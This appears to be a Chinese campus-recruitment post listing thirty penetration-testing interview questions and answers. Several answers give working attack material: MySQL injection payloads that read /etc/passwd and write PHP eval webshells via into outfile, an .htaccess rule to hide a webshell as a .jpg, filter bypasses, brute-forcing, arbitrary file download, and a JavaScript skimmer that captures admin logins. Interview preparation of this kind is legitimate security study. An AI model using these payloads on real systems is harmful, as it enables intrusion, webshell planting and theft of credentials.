校招護(hù)航|信安滲透測試面試題大全來了
知了姐喊你來刷題啦!要想面試能成功,刷題一定要用功!
特奉上校招沖刺之滲透測試工程師面試題大全,做你的面試助推器!

01.拿到一個待檢測的站,你覺得應(yīng)該先做什么?
收集信息:whois、網(wǎng)站源 IP、旁站、C段網(wǎng)站、服務(wù)器系統(tǒng)版本、容器版本、程序版本、數(shù)據(jù)庫類型、二級域名、防火墻、維護(hù)者信息另說...
02.mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別?
5.0以下沒有information_schema這個系統(tǒng)表,無法列表名等,只能暴力跑表名;5.0以下是多用戶單操作,5.0以上是多用戶多操作。
03.在滲透過程中,收集目標(biāo)站注冊人郵箱對我們有什么價值?
(1)丟社工庫里看看有沒有泄露密碼,然后嘗試用泄露的密碼進(jìn)行登錄后臺
(2)用郵箱做關(guān)鍵詞進(jìn)行丟進(jìn)搜索引擎
(3)利用搜索到的關(guān)聯(lián)信息找出其他郵箱進(jìn)而得到常用社交賬號
(4)社工找出社交賬號,里面或許會找出管理員設(shè)置密碼的習(xí)慣
(5)利用已有信息生成專用字典
(6) 觀察管理員常逛哪些非大眾性網(wǎng)站,拿下它,你會得到更多好東西
04.判斷出網(wǎng)站的CMS對滲透有什么意義?
查找網(wǎng)上已曝光的程序漏洞,如果開源,還能下載相對應(yīng)的源碼進(jìn)行代碼審計。
05.一個成熟并且相對安全的CMS,滲透時掃目錄的意義?
(1)敏感文件、二級目錄掃描
(2)站長的誤操作比如:網(wǎng)站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點(diǎn)
06.常見的網(wǎng)站服務(wù)器容器?
IIS、Apache、nginx、Tomcat,weblogic、jboss
07.mysql注入點(diǎn),用工具對目標(biāo)站直接寫入一句話,需要哪些條件?
root權(quán)限以及

網(wǎng)站的絕對路徑
load_file()讀取文件操作
前提:
知道文件的絕對路徑
能夠使用union查詢
對web目錄有寫的權(quán)限
union select 1,load_file('/etc/passwd'),3,4,5#
0x2f6574632f706173737764
union select1 ,
load_file(0x2f6574632f706173737764),3,4,5#
路徑?jīng)]有加單引號的話必須轉(zhuǎn)換十六進(jìn)制
要是想省略單引號的話必須轉(zhuǎn)換十六進(jìn)制
into outfile寫入文件操作
前提:
文件名必須是全路徑(絕對路徑)
用戶必須有寫文件的權(quán)限
沒有對單引號'過濾
select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php'
select '<?php @eval($_POST["admin"]); ?>' into outfile
'C:\Windows\tmp\8.php'
路徑里面兩個反斜杠\可以換成一個正斜杠/
PHP語句沒有單引號的話,必須轉(zhuǎn)換成十六進(jìn)制
要是想省略單引號'的話,必須轉(zhuǎn)換成十六進(jìn)制
<?php eval($_POST["admin"]); ?> 或者 <?php
eval($_GET["admin"]); ?>
<?php @eval($_POST["admin"]); ?>
<?php phpinfo(); ?>
<?php eval($_POST["admin"]); ?>
建議一句話PHP語句轉(zhuǎn)換成十六進(jìn)制
08.目前已知哪些版本的容器有解析漏洞,具體舉例?
(1) IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夾名
(2) IIS 7.0/7.5
默認(rèn)Fast-CGI開啟,直接在url中圖片地址后面輸入/1.php,會把正常圖片當(dāng)成php解析
(3) Nginx
版本小于等于0.8.37,利用方法和IIS 7.0/7.5一樣,F(xiàn)ast-CGI關(guān)閉情況下也可利用。
空字節(jié)代碼 xxx.jpg.php
(4)Apache
上傳的文件命名為:test.php.x1.x2.x3,Apache是從右往左判斷后綴
(5)lighttpd
xx.jpg/xx.php
09.如何手工快速判斷目標(biāo)站是windows還是linux服務(wù)器?
linux大小寫敏感,windows大小寫不敏感
10.為何一個mysql數(shù)據(jù)庫的站,只有一個80端口開放?
(1)更改了端口,沒有掃描出來
(2) 站庫分離
(3) 3306端口不對外開放
11.3389無法連接的幾種情況?
(1)沒開放3389 端口
(2)端口被修改
(3) 防護(hù)攔截
(4)處于內(nèi)網(wǎng)(需進(jìn)行端口轉(zhuǎn)發(fā))
12.如何突破注入時字符被轉(zhuǎn)義?
寬字符注入;hex編碼繞過
13.拿到一個待檢測的站,你覺得應(yīng)該先做什么?
查看編輯器的名稱版本,然后搜索公開的漏洞
14.拿到一個webshell發(fā)現(xiàn)網(wǎng)站根目錄下有.htaccess文件,我們能做什么?
能做的事情很多,用隱藏網(wǎng)馬來舉例子:插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php</FilesMatch>.jpg文件會被解析成.php文件

15.注入漏洞只能查賬號密碼?
可脫褲,可上傳webshell,可執(zhí)行命令
16.安全狗會追蹤變量,從而發(fā)現(xiàn)出是一句話木馬嗎?
是根據(jù)特征碼,所以很好繞過
17.access 掃出后綴為asp的數(shù)據(jù)庫文件,訪問亂碼。如何實(shí)現(xiàn)到本地利用?
迅雷下載,直接改后綴為.mdb
18.提權(quán)時選擇可讀寫目錄,為何盡量不用帶空格的目錄?
因?yàn)閑xp執(zhí)行多半需要空格界定參數(shù)
19.某服務(wù)器有站點(diǎn)A,B 為何在A的后臺添加test用戶,訪問B的后臺。發(fā)現(xiàn)也添加上了test用戶?
同數(shù)據(jù)庫
20.注入時可以不使用and 或or 或xor,直接order by 開始注入嗎?
and/or/xor,前面的1=1、1=2步驟只是為了判斷是否為注入點(diǎn),如果已經(jīng)確定是注入點(diǎn)那就可以省那步驟去
21.某個防注入系統(tǒng),在注入時會提示:統(tǒng)檢測到你有非法注入的行為。已記錄您的ip xx.xx.xx.xx 時間:2016:01-23提交頁面:test.asp?id=15提交內(nèi)容:and 1=1如何利用這個防注入系統(tǒng)拿shell?
在URL里面直接提交一句話,這樣網(wǎng)站就把你的一句話也記錄進(jìn)數(shù)據(jù)庫文件了,這個時候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。具體文章參見:
http://ytxiao.lofter.com/post/40583a_ab36540
22.上傳大馬后訪問亂碼時,有哪些解決辦法?
瀏覽器中改編碼
23.審查上傳點(diǎn)的元素有什么意義?
有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時只要增加上傳類型就能突破限制了
24.目標(biāo)站禁止注冊用戶,找回密碼處隨便輸入用戶名提示:“此用戶不存在”,你覺得這里怎樣利用?
先爆破用戶名,再利用被爆破出來的用戶名爆破密碼。

25.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為
http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
這就任意文件下載漏洞,在file=后面嘗試輸入index.php下載他的首頁文件,
然后在首頁文件里繼續(xù)查找其他網(wǎng)站的配置文件,可以找出網(wǎng)站的數(shù)據(jù)庫密碼和數(shù)據(jù)庫的地址。
26.甲給你一個目標(biāo)站,并且告訴你根目錄下存在/abc/目錄,并且此目錄下存在編輯器和admin目錄。請問你的想法是?
直接在網(wǎng)站二級目錄/abc/下掃描敏感文件及目錄
27.在有shell的情況下,如何使用xss實(shí)現(xiàn)對目標(biāo)站的長久控制?
(1)后臺登錄處加一段記錄登錄賬號密碼的js,并且判斷是否登錄成功,如果登錄成功,就把賬號密碼記錄到一個生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中。(此方法適合有價值并且需要深入控制權(quán)限的網(wǎng)絡(luò))
(2)在登錄后才可以訪問的文件中插入XSS腳本
28.后臺修改管理員密碼處,原密碼顯示為*。你覺得該怎樣實(shí)現(xiàn)讀出這個用戶的密碼?
審查元素 把密碼處的password屬性改成text就明文顯示了
29.目標(biāo)站無防護(hù),上傳圖片可以正常訪問,上傳腳本格式訪問則403.什么原因?
原因很多,有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本,嘗試改后綴名繞過
30.審查元素得知網(wǎng)站所使用的防護(hù)軟件,你覺得怎樣做到的?
在敏感操作被攔截,通過界面信息無法具體判斷是什么防護(hù)的時候,F(xiàn)12看HTML體部 比如護(hù)衛(wèi)神就可以在名稱內(nèi)看到<hws>內(nèi)容<hws>
